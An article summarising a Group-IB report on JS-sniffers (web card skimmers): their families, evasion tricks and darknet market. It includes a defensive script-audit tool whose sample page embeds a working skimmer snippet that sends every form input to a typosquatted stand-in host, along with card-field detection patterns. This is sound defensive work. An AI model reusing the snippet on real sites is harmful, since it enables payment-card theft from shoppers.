Group-IB has analyzed the darknet market behind JS-sniffers, including its monetization methods and infrastructure. According to its report, JS-sniffer developers have made millions of dollars from this malware.
E-Commerce Market Security Threats
The first report on this kind of e-commerce cybercrime came from RiskIQ and Flashpoint researchers, who documented the first instances of JS-sniffer activity and traced it to 12 cybercriminal groups that they collectively named MageCart.
Group-IB went a step further: its analysts gained access to the groups' source code, tools, administrative panels and other parts of their infrastructure. The Group-IB report, titled "Crime without punishment: In-depth analysis of JS-sniffers", covers 38 JS-sniffer families; the detailed per-family descriptions are available to Group-IB Threat Intelligence customers.
Malware analysts had previously considered JS-sniffers a minor threat that did not merit in-depth investigation. That changed once they proved to be a serious risk to online shoppers: the British Airways compromise, which hit both the airline's website and its mobile app and exposed roughly 380,000 payment transactions, and the Ticketmaster breach, in which customers' payment data was stolen by JS-sniffer operators. The sportswear company Fila was another victim, with the data of 5,600 of its customers compromised.
According to Group-IB, JS-sniffers put payment systems, end users, e-commerce companies and even banks at risk of losing data to criminals. The problem is understudied, which means the perpetrators almost always get away with stealing users' identities, data and money.
A JS-sniffer is the online equivalent of a card skimmer, the device installed on an ATM to capture bank card details. A JS-sniffer is malicious JavaScript injected into a web page, typically the checkout page, that intercepts what users type into forms: user names, passwords, addresses, payment card numbers and more.
Once stolen, the data is sold to other criminals on the darknet. A stolen card typically fetches $1 to $15, depending on how "valuable" it is. Most of the underground forums where cards harvested by JS-sniffers are offered for sale are Russian-speaking.
JS-sniffer operators apparently make thousands of dollars per month from selling cards and other user data. Sites infected with the WebRank sniffer alone receive 250,000 visitors per day, of whom about 2,500 complete a purchase. At the lower end of the price range above, that is $2,500 to $12,500 per day, or $75,000 to $375,000 per month. And WebRank is only third on the list of the most profitable JS-sniffers: MagentoName and CoffeMokko top it, with over 440,000 visitors per day each.
How Does It Work?
According to the Group-IB report, more than half of the 2,440 websites found infected with JS-sniffers were compromised by the MagentoName family, which exploits outdated Magento CMS installations to inject malicious code into the store. About 13% of the infections are the work of the WebRank family, which compromises third-party sites whose scripts the target stores load, so that the malicious code reaches the target through a trusted dependency.
A further 11% of infections belong to the CoffeMokko family, which steals payment data through complex scripts tailored to the payment forms of each site into which the sniffer is embedded.
Payment systems targeted include PayPal, Sage Pay, eWAY, Verisign, Authorize.net, USAePay, Stripe and others. Each JS-sniffer family tests its script against each payment system's form and adapts it where needed so that it works reliably there.
All JS-sniffers discovered so far share the same goal: stealing payment data from stores running platforms such as Magento, WordPress, WooCommerce, Shopify and OpenCart.
The families identified include MagentoName, PreMage, GetBilling, Qoogle, FakeCDN and PostEval. Others, such as WebRank and G-Analytics, are universal: not tied to a particular platform, they can be quietly injected into any website.
Interestingly, the Group-IB researchers found a fair amount of competition between the families: a sniffer may detect and remove a competitor's sniffer and replace it with its own code.
Often a competing family simply reuses the other sniffer's "body" (its data-harvesting code), pointing it at its own gate (collection server) so that everything the competitor had been collecting flows to it instead. WebRank in particular does this. Many families also modify their sniffers to make them harder to detect.
ReactGet and ImageID, for instance, are notoriously hard to spot because they only activate once the user completes the transaction, so a scan of the checkout page that does not go through a full purchase never sees them run. CoffeMokko and a few other families build a unique sniffer for every infection: each script is used once, on a single website, and never reused, which defeats signature-based detection.
G-Analytics is another distinctive family: it injects its code directly into the site's HTML, and also into the server-side PHP scripts that render the e-commerce site's payment page, so the malicious code is served as part of the page itself rather than loaded from elsewhere. This makes its activity much harder to detect while it is running. G-Analytics and ImageID also imitate and hide behind uQuery, Google Analytics and other legitimate services in order to blend into e-commerce websites and harvest user data.
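The lookalike-service trick and the form-hooking behaviour described above can be checked for, at least as a first pass, by auditing the scripts a checkout page serves. The following is an added example written for this page, not code from the Group-IB report or from any of the families it names. It takes a page's HTML, pulls out every `<script>`, flags external scripts from hosts outside a per-site allowlist or within two edits of an allowed domain (the `google-analytcs.com`-style typosquat), and flags inline scripts that hook or read a form and hand the result to a network call. The allowlist, the regexes, the assumed store origin `shop.example.com` and the sample page are all constructed for the example.

```javascript
// Added example (not from the Group-IB report): a static first-pass audit of
// the <script> tags on a checkout page. Allowlist, regexes and the sample page
// below are constructed for the example; real deployments need their own list.
const ALLOWED_HOSTS = new Set([
  "www.google-analytics.com", "code.jquery.com",
  "shop.example.com", // the store's own origin (assumed)
]);
const HOOK = [/addEventListener\s*\(\s*['"](submit|click|keyup|change)['"]/, /\.on(submit|click|keyup)\s*=/];
const COLLECT = [/querySelectorAll\s*\(\s*['"]input/, /getElementsByTagName\s*\(\s*['"]input['"]/,
  /\b(cc_?num(ber)?|card_?number|cvv|cvc|exp(iry|_month|_year))\b/i];
const SEND = [/\bfetch\s*\(/, /new\s+XMLHttpRequest\b/, /navigator\.sendBeacon\s*\(/, /new\s+Image\s*\(\s*\)/];
const ENCODE = [/\batob\s*\(/, /\bbtoa\s*\(/, /\beval\s*\(/, /String\.fromCharCode/];

// Single-row Levenshtein edit distance, used for the lookalike-host check.
function levenshtein(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0];
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const above = row[j];
      row[j] = Math.min(above + 1, row[j - 1] + 1, diag + (a[i - 1] === b[j - 1] ? 0 : 1));
      diag = above;
    }
  }
  return row[b.length];
}

// Last two labels of a host, ignoring "www." (approximation: wrong for co.uk-style suffixes).
function registrable(host) {
  return host.replace(/^www\./, "").split(".").slice(-2).join(".");
}

// An allowed host whose registrable domain is within 2 edits of `host`, or null.
function lookalikeOf(host) {
  if (ALLOWED_HOSTS.has(host)) return null;
  const mine = registrable(host);
  for (const good of ALLOWED_HOSTS) {
    const theirs = registrable(good);
    if (mine !== theirs && levenshtein(mine, theirs) <= 2) return good;
  }
  return null;
}

// Pull every <script> out of the HTML: external ones carry `src`, inline ones a `body`.
function extractScripts(html) {
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  const out = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(m[1]);
    out.push({ src: src ? src[1] : null, body: m[2] });
  }
  return out;
}

// An inline script is suspicious when form hooking/reading, or decoding, sits next to a send.
function classifyInline(body) {
  const has = (pats) => pats.some((p) => p.test(body));
  const reasons = [];
  if ((has(HOOK) || has(COLLECT)) && has(SEND)) reasons.push("form data routed to a network call");
  if (has(ENCODE) && has(SEND)) reasons.push("encoding/eval next to a network call");
  return reasons;
}

function auditPage(html, pageOrigin = "https://shop.example.com/") {
  const findings = [];
  for (const s of extractScripts(html)) {
    const reasons = [];
    if (s.src !== null) {
      let host = null;
      try { host = new URL(s.src, pageOrigin).hostname.toLowerCase(); } catch (e) { /* leave null */ }
      if (host === null) reasons.push("unparseable src");
      else {
        if (!ALLOWED_HOSTS.has(host)) reasons.push("host not in allowlist");
        const near = lookalikeOf(host);
        if (near) reasons.push("lookalike of " + near);
      }
    } else {
      reasons.push(...classifyInline(s.body));
    }
    if (reasons.length) findings.push({ script: s.src === null ? "(inline)" : s.src, reasons });
  }
  return findings;
}

// Constructed page: three legitimate scripts, a harmless inline validator, a
// typosquatted analytics host, and an inline sniffer-style snippet.
const SAMPLE_CHECKOUT = `<html><body>
<script src="https://www.google-analytics.com/analytics.js"></script>
<script src="https://code.jquery.com/jquery-3.4.1.min.js"></script>
<script src="/js/checkout.js"></script>
<form id="pay"><input name="cc_number"><input name="cvv"></form>
<script>document.getElementById('pay').addEventListener('submit', function () { console.log('validating'); });</script>
<script src="https://google-analytcs.com/ga.js"></script>
<script>
  var g = atob('aHR0cHM6Ly8=') + 'google-analytcs.com/gate';
  document.forms[0].addEventListener('submit', function () {
    var d = {};
    document.querySelectorAll('input').forEach(function (i) { d[i.name] = i.value; });
    new Image().src = g + '?q=' + btoa(JSON.stringify(d));
  });
</script>
</body></html>`;

for (const f of auditPage(SAMPLE_CHECKOUT)) console.log(f.script, "=>", f.reasons.join("; "));
```

Run against the sample page, the audit reports the typosquatted host (not allowlisted, and one edit away from google-analytics.com) and the inline snippet that reads every input and ships it out through an image request. The harmless validator, which also hooks `submit` but never sends anything, is not flagged. Two caveats follow from the text above: a static fetch of the page catches nothing from families such as ReactGet and ImageID that only activate at the end of the transaction, so the scripts have to be captured from a real checkout run, and a per-infection unique script (CoffeMokko) will not match any fixed signature, which is why the inline check keys on behaviour (hook or read, then send) rather than on known code.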
JS-sniffer attacks usually follow a multi-tiered approach. Group-IB analysts found that the criminals do not stop at injecting the sniffer into the website: they can also create fake payment forms that look like the real thing. With this method the JS-sniffer operator steers the user away from paying through a PayPal account, where the card details would be entered on PayPal's own pages and out of the sniffer's reach, and toward entering a credit card directly, by displaying a fake message that "this payment option is currently unavailable."
The JS-Sniffer Market
The JS-sniffer market has grown almost as fast as the e-commerce industry and is characterized by complex relationships between buyers and sellers. A given sniffer is used both by the group that originally wrote it and by a number of other groups that rent it as a service, so it is safe to assume that far more criminal groups are running JS-sniffer attacks than there are sniffer families.
A JS-sniffer sells for $250 to $5,000 on underground forums. Some services also offer partnerships, in which one party (the customer) supplies a compromised online store in exchange for a share of the profits, while the JS-sniffer developer provides the customer with an administrative panel, technical support and hosting servers from which to operate without being detected.
Because of the tangled relationships on the darknet, it is difficult to pinpoint which group is responsible for a given crime, but Group-IB's indicators show that the three families above (MagentoName, WebRank and CoffeMokko) account for most of the infections. The best news in the Group-IB report is a list of recommendations on what to do if you or your organization falls prey to a JS-sniffer attack, with guidance for banks, online shoppers, e-commerce stores, payment systems and others.
Group-IB and other organizations continue to research the JS-sniffer phenomenon, and new developments on the threat are published through the Group-IB Threat Intelligence system.